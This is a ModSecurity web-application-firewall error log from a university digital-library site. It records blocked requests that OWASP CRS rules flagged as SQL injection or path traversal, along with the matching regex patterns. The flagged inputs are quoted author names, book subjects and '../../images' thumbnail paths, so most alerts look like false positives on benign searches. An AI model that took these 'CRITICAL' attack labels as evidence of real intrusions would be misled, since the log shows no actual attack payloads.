[Mon Aug 28 10:06:10.891542 2023] [:error] [pid 39924] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ARSITEK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwPIsCo-f0AAJv0IqIAAAAJ"]
[Mon Aug 28 10:07:24.180754 2023] [:error] [pid 40001] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HERLINA, MONICA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwPbMCo-f0AAJxBCGwAAAAK"]
[Mon Aug 28 10:15:34.995768 2023] [:error] [pid 40253] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwRVsCo-f0AAJ09tbIAAAAR"]
[Mon Aug 28 10:15:56.029784 2023] [:error] [pid 40262] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20220922_11004453.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwRbMCo-f0AAJ1Gq7AAAAAK"]
[Mon Aug 28 10:18:19.458927 2023] [:error] [pid 40248] [client 47.128.19.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22STATISTIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwR@8Co-f0AAJ0482oAAAAG"]
[Mon Aug 28 11:05:06.334469 2023] [:error] [pid 41004] [client 52.167.144.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ERIK, EDWARD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwc8sCo-f0AAKAswu8AAAAE"]
[Mon Aug 28 11:09:39.470426 2023] [:error] [pid 41054] [client 47.128.22.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DEWI, INDRIYANTI ALEXANDRA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOweA8Co-f0AAKBexfwAAAAA"]
[Mon Aug 28 11:15:02.658485 2023] [:error] [pid 41204] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ARYANI, FARIDA RINA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwfRsCo-f0AAKD0wegAAAAN"]
[Mon Aug 28 11:19:47.267595 2023] [:error] [pid 41243] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MARZUKI, PETER MAHMUD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwgY8Co-f0AAKEbEkQAAAAI"]
[Mon Aug 28 11:26:30.650334 2023] [:error] [pid 41186] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KOMPUTER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwh9sCo-f0AAKDiEnAAAAAC"]
[Mon Aug 28 11:28:40.432290 2023] [:error] [pid 41451] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ALFREDO H-S.ANG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwieMCo-f0AAKHrBuMAAAAI"]
[Mon Aug 28 11:29:03.936735 2023] [:error] [pid 41459] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SANUSI, ANWAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwij8Co-f0AAKHz9BYAAAAJ"]
[Mon Aug 28 11:32:38.216215 2023] [:error] [pid 41450] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMI REGIONAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwjZsCo-f0AAKHqvmcAAAAG"]
[Mon Aug 28 11:36:54.202838 2023] [:error] [pid 41538] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KEDOKTERAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwkZsCo-f0AAKJCUogAAAAI"]
[Mon Aug 28 11:40:33.865459 2023] [:error] [pid 41689] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nurul Huda\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwlQcCo-f0AAKLZVREAAAAH"]
[Mon Aug 28 11:44:51.940756 2023] [:error] [pid 41524] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NOFRION\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmQ8Co-f0AAKI09o4AAAAa"]
[Mon Aug 28 11:45:13.321852 2023] [:error] [pid 41613] [client 47.128.28.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ISMADI, JANU\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmWcCo-f0AAKKNa78AAAAB"]
[Mon Aug 28 11:48:28.961362 2023] [:error] [pid 41803] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HALIM, ABDUL.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwnHMCo-f0AAKNLQmoAAAAX"]
[Mon Aug 28 11:48:43.915686 2023] [:error] [pid 41807] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22P. Lindawat S. Sewu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwnK8Co-f0AAKNPOfEAAAAc"]
[Mon Aug 28 11:49:24.983397 2023] [:error] [pid 41834] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ROCHYM, ABDUL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwnVMCo-f0AAKNqkBUAAAA3"]
[Mon Aug 28 11:53:41.386842 2023] [:error] [pid 41905] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22GUYTON\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwoVcCo-f0AAKOxb6AAAAAM"]
[Mon Aug 28 11:57:01.519881 2023] [:error] [pid 41955] [client 47.128.16.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22STEPHENSON,  DAVID\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwpHcCo-f0AAKPj0-8AAAAN"]
[Mon Aug 28 11:57:43.669034 2023] [:error] [pid 41960] [client 47.128.21.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HARDINI, ISRIANI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwpR8Co-f0AAKPoNnsAAAAL"]
[Mon Aug 28 12:01:16.912294 2023] [:error] [pid 42025] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUGIANTO, FAJAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwqHMCo-f0AAKQp0i0AAAAE"]
[Mon Aug 28 12:02:25.286493 2023] [:error] [pid 41934] [client 47.128.20.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/img639.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwqYcCo-f0AAKPOc44AAAAt"]
[Mon Aug 28 12:02:59.211901 2023] [:error] [pid 42010] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hery Sonawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwqg8Co-f0AAKQa-UIAAAAB"]
[Mon Aug 28 12:05:40.169647 2023] [:error] [pid 42004] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PIDANA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrJMCo-f0AAKQUXnsAAAAT"]
[Mon Aug 28 12:10:57.810684 2023] [:error] [pid 42098] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BISNIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwsYcCo-f0AAKRy@VoAAAAf"]
[Mon Aug 28 12:13:30.401661 2023] [:error] [pid 42258] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SURAT LAMARAN KERJA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOws@sCo-f0AAKUSERkAAAAE"]
